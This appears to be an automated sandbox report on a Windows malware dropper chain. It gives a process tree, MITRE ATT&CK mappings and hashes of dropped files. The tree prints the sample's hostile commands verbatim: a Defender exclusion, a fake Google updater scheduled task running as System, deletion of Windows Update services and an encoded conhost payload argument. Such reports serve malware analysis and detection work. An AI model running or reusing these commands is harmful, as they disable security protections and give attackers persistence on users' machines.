PID 4944 wrote to memory of 1856	4944	cmd.exe	powercfg.exe
PID 4944 wrote to memory of 1856	4944	cmd.exe	powercfg.exe
PID 3888 wrote to memory of 668	3888	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe
"C:\Users\Admin\AppData\Local\Temp\b5fcaaf6b6e2be5f74d2d0b28b459e240e7c3c3e6fb0f25414759da31a28074f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3800

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4752

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
4⤵
- Creates scheduled task(s)
PID:3560

C:\Users\Admin\AppData\Local\Temp\setup32.exe
"C:\Users\Admin\AppData\Local\Temp\setup32.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:99952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#cthbhmckn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2656

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:4944

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:540

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
- Suspicious use of WriteProcessMemory
PID:3888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#iljoca#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
4⤵
PID:3860

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
5⤵
PID:5100

C:\Users\Admin\AppData\Local\Temp\setup3221.exe
"C:\Users\Admin\AppData\Local\Temp\setup3221.exe"
3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4284

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"
4⤵
- Blocklisted process makes network request
PID:792

C:\Windows\Temp\222.exe
"C:\Windows\Temp\222.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4980

C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
"C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1576

C:\Users\Admin\AppData\Local\Temp\watchdog.exe
"C:\Users\Admin\AppData\Local\Temp\watchdog.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4128

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:99756

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1356

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:4816

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:1780

C:\Windows\system32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:1496

C:\Windows\system32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:372

C:\Windows\system32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:668

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
1⤵
PID:236

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
1⤵
PID:2104

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:2196

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
1⤵
PID:1072

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
1⤵
- Modifies security service
PID:1132

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:5116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5688

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:6388

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:6644

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:6696

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:6712

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:6732

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:6748

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:6764

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:6784

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:6804

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:6820

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:6852

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:6400

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:6496

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:6572

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:6588

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:6660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#cthbhmckn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6436

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe ekwaxvtzumfvch
2⤵
PID:7884

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:7912

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
- Modifies data under HKEY_USERS
PID:7980

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:7924

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe cxfacjpoynzyzzmc GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1g/oS7Mgp0E17ll9y0I6gqFt/X0Sayxrm+G3lICBwYbS
2⤵
PID:8024

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
6.9MB

MD5
a82a470f0d0f7a7ebcc1735f2ba2717b

SHA1
7c5c8ff69c12cf328792ae85517d76d4591258fc

SHA256
c451372c8cab80d572af86c3bbb34617f481eb59a79b2f6053851982bae54e15

SHA512
ed04a6c739314f95d645ec15890b4056382210a9ca9fc0eff888c547a6291bd5a294781e07590c71a2261d7e8a5512ba82b5a9f0b0308b84e7c6eb1e9e45e302

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
6.9MB

MD5
a82a470f0d0f7a7ebcc1735f2ba2717b

SHA1
7c5c8ff69c12cf328792ae85517d76d4591258fc

SHA256
c451372c8cab80d572af86c3bbb34617f481eb59a79b2f6053851982bae54e15

SHA512
ed04a6c739314f95d645ec15890b4056382210a9ca9fc0eff888c547a6291bd5a294781e07590c71a2261d7e8a5512ba82b5a9f0b0308b84e7c6eb1e9e45e302

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
1KB

MD5
2f72537f636dc6eee43878bc859a4ec0

SHA1
5dcd85434721902b906d4e06907873844760d348

SHA256
39702baf633ce7008b7be66ed67aec862ac6d2b6a4ed975cafaa9e5e6aba2a89

SHA512
675553a3e6f33a2f2e98488ced3e01be15a65ea9b46c4976be590b2683b99162684318d926e5f605d51febbf460f845345968b14786b8b6d199a539439007f43

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
438B

MD5
c393fc81646446d70022d0ffce9a8e53

SHA1
1a1e1e8da9afea171106ddd5c08bdd244d543575

SHA256
c189cb54a5d4656fefcf2ff004447ca470e81f4009a410535e836cef8ab944d6

SHA512
9215c9a88fc64af06d8af3960176ac7f3deac920d6686faaeef3260c92a7df26b5b4c58481213b67b6240babd22d89104c0b3c9023753c9ac3c05a5f3bc50a92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9035a670a93cf426f8310f360f04e6d5

SHA1
4d1d14576d032f041e95931169ac94ebca782947

SHA256
e4a3785e2913e9b3922939b086179606de073d9b02b2205ac899bae1b33c8f19

SHA512
6e7ff57ffedba06ef0984e54687a44a4659d4039f18c6ab6047ee1b443c99cf238d156d5a1d30b3d79664529cdaf2cf932cf81c61a1637e5d758bf0f14c043e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a96a835e81c7d7d4a222641bbf8e0d2b

SHA1
4632c2298d31f5bcdbc04c0da07050fe36418336

SHA256
9280fbf6ad54f9093224bece6ed89627aa4d77cb76f735bfbbd670f688c21fac

SHA512
94999b431c1a0ff638d37eb7d85082568f3b1474f58af25e978cb6e38743d806ac276b18a73f6656601f6f1eae6d2b3d0687ff6393c13dbf9e3d56f0566b7d25

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
Filesize
61KB

MD5
c68f85e5147e6960b8d948f4fb1136c0

SHA1
eea8bede7ee96773ef6048a4d2a44ee1f608370a

SHA256
ce87360f0f67ba8a392e9214c89c24976121c803cf4d49825117b0e30e04e97b

SHA512
3b0802e35913adb6158313de922072d35c5c798fc1991e21afee0f0b1fe2430eb1a13a9d6e7cc99d4bb1523005ce36a194ae4dd21e5a887a081ead9f5bb6cc70

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
Filesize
61KB

MD5
c68f85e5147e6960b8d948f4fb1136c0

SHA1
eea8bede7ee96773ef6048a4d2a44ee1f608370a

SHA256
ce87360f0f67ba8a392e9214c89c24976121c803cf4d49825117b0e30e04e97b

SHA512
3b0802e35913adb6158313de922072d35c5c798fc1991e21afee0f0b1fe2430eb1a13a9d6e7cc99d4bb1523005ce36a194ae4dd21e5a887a081ead9f5bb6cc70

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup32.exe
Filesize
6.9MB

MD5
c24701f805733b3f6c168df6757a8a2b

SHA1
6e89449a661461a409593624513a7bc0e2eb35b9

SHA256
40220335eb7ec4c39d6e364b7703ba03dd5c366a7614e6d4a518e72789012816

SHA512
f2a8182884a28985b6c1f4e4df9d7c76b95809daa889f0bac6a61970d315115ba98d936889f58a2746d55534acae0e49769485055e0c8f7f087b15b66186dca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup32.exe
Filesize
6.9MB

MD5
c24701f805733b3f6c168df6757a8a2b

SHA1
6e89449a661461a409593624513a7bc0e2eb35b9

SHA256
40220335eb7ec4c39d6e364b7703ba03dd5c366a7614e6d4a518e72789012816

SHA512
f2a8182884a28985b6c1f4e4df9d7c76b95809daa889f0bac6a61970d315115ba98d936889f58a2746d55534acae0e49769485055e0c8f7f087b15b66186dca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup3221.exe
Filesize
372KB

MD5
ad1b835b251bc2574967004eedf88c5e

SHA1
94add3268d8f70c7c49af71b381098745629ac5d

SHA256
1ad8faf6462969c99804c91cf6a55d695ffc4aab9a8d3ced097238fd93ee8fba

SHA512
aad2adeaf83a0a2067b6aafef71d5ad1585e150e478996003fabe6e1e125ae3bbea996f05b8c9adfb3bc42c554eebaf477dfcd053a9cccb89067618c01757bcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup3221.exe
Filesize
372KB

MD5
ad1b835b251bc2574967004eedf88c5e

SHA1
94add3268d8f70c7c49af71b381098745629ac5d

SHA256
1ad8faf6462969c99804c91cf6a55d695ffc4aab9a8d3ced097238fd93ee8fba

SHA512
aad2adeaf83a0a2067b6aafef71d5ad1585e150e478996003fabe6e1e125ae3bbea996f05b8c9adfb3bc42c554eebaf477dfcd053a9cccb89067618c01757bcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.5MB

MD5
6e9adc4d99307894474fe084bf14c96e

SHA1
29311907539793028094ca57bf0f345b3986a493

SHA256
2952b5bd0d7bee7a56c021206262f68691ed8d9df7097587d8f9312005851089

SHA512
72a8290683f1712cffb522582f3e78cb4c2b70f1cfcf1766b8556956b469f41d82819a2b727886a2e4171274a8a3ff09ff6abb7ab16fef0a18881e2bf79e6590

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.5MB

MD5
6e9adc4d99307894474fe084bf14c96e

SHA1
29311907539793028094ca57bf0f345b3986a493

SHA256
2952b5bd0d7bee7a56c021206262f68691ed8d9df7097587d8f9312005851089

SHA512
72a8290683f1712cffb522582f3e78cb4c2b70f1cfcf1766b8556956b469f41d82819a2b727886a2e4171274a8a3ff09ff6abb7ab16fef0a18881e2bf79e6590

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Windows\Temp\1.vbs
Filesize
105B

MD5
7402b8035ec1c280ca12067fb48f78cf

SHA1
f53efaa35eca6c64b1a54d250cd644d07269c787

SHA256
6479ad76955df79ac09773987823c4ca59f16db33668dae727d97c05178d2726

SHA512
bb7c9bf83e31de09f483221ee24ca12425c95e4e01005d8473666302e42b3633c974407d1053fd970fb325f1d35529c802486444fe5bc6ca72f024ff8d7d7d0b

Download Submit
C:\Windows\Temp\222.exe
Filesize
107KB

MD5
78695e873feaeac1402e455dd453548e

SHA1
e3d70fb98044d497e71f69351d494eb70e2593f9

SHA256
2039167e9f03f7d519176b34c59040050398172b7aee53449f6159b2a57c1a1a

SHA512
8f535410f5d6e41354785949f1e33c44028894c68233e2b6ad299dd1a6a0d4dcda8a4c7ca5d190b1c0712948521f8a1dc7968590ff593cd03be647bacdb838c9

Download Submit
C:\Windows\Temp\222.exe
Filesize
107KB

MD5
78695e873feaeac1402e455dd453548e

SHA1
e3d70fb98044d497e71f69351d494eb70e2593f9

SHA256
2039167e9f03f7d519176b34c59040050398172b7aee53449f6159b2a57c1a1a

SHA512
8f535410f5d6e41354785949f1e33c44028894c68233e2b6ad299dd1a6a0d4dcda8a4c7ca5d190b1c0712948521f8a1dc7968590ff593cd03be647bacdb838c9

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
573d77d4e77a445f5db769812a0be865

SHA1
7473d15ef2d3c6894edefd472f411c8e3209a99c

SHA256
5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c

SHA512
af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
631f4b3792b263fdda6b265e93be4747

SHA1
1d6916097d419198bfdf78530d59d0d9f3e12d45

SHA256
4e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976

SHA512
e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
480eee42fcc3e392e7c02afa63262eba

SHA1
d391f301dc17f08a267246c8462ede4cd06ed711

SHA256
fe3df13d9f256da7d5dc1522fec19a9505a2d52af97ffb18cbc0ce9980ff4f36

SHA512
291d93d6f8f4a8e49765535f9deea2cdecd4f473ba896727139cf8a7a36315e1fb1ee397f7c49ad88d1740b1654c0b193bd55d5aad2d525ed4d022b65bb159c5

Download Submit
\Users\Admin\AppData\LocalLow\mozglue.dll
Filesize
612KB

MD5
f07d9977430e762b563eaadc2b94bbfa

SHA1
da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Download Submit
\Users\Admin\AppData\LocalLow\nss3.dll
Filesize
1.9MB

MD5
f67d08e8c02574cbc2f1122c53bfb976

SHA1
6522992957e7e4d074947cad63189f308a80fcf2

SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
Filesize
1.0MB

MD5
dbf4f8dcefb8056dc6bae4b67ff810ce

SHA1
bbac1dd8a07c6069415c04b62747d794736d0689

SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Download Submit
memory/236-730-0x0000000000000000-mapping.dmp

Download
memory/372-724-0x0000000000000000-mapping.dmp

Download
memory/540-716-0x0000000000000000-mapping.dmp

Download
memory/668-728-0x0000000000000000-mapping.dmp

Download
memory/792-341-0x0000000000000000-mapping.dmp

Download
memory/800-707-0x0000000000000000-mapping.dmp

Download
memory/1072-735-0x0000000000000000-mapping.dmp

Download
memory/1132-734-0x0000000000000000-mapping.dmp

Download
memory/1208-720-0x0000000000000000-mapping.dmp

Download
memory/1356-581-0x0000000000140000-0x00000000004A1000-memory.dmp

Filesize
3.4MB

Download
memory/1356-276-0x0000000000140000-0x00000000004A1000-memory.dmp

Filesize
3.4MB

Download
memory/1356-257-0x0000000000140000-0x00000000004A1000-memory.dmp

Filesize
3.4MB

Download
memory/1496-722-0x0000000000000000-mapping.dmp

Download
memory/1576-488-0x0000000000000000-mapping.dmp

Download
memory/1780-715-0x0000000000000000-mapping.dmp

Download
memory/1856-726-0x0000000000000000-mapping.dmp

Download
memory/2104-732-0x0000000000000000-mapping.dmp

Download
memory/2196-738-0x0000000000000000-mapping.dmp

Download
memory/2656-696-0x0000000000000000-mapping.dmp

Download
memory/3560-207-0x0000000000000000-mapping.dmp

Download
memory/3800-118-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/3800-116-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/3800-120-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

Download
memory/3800-117-0x0000000140003E0C-mapping.dmp

Download
memory/3800-159-0x0000000140000000-0x0000000140022000-memory.dmp

Filesize
136KB

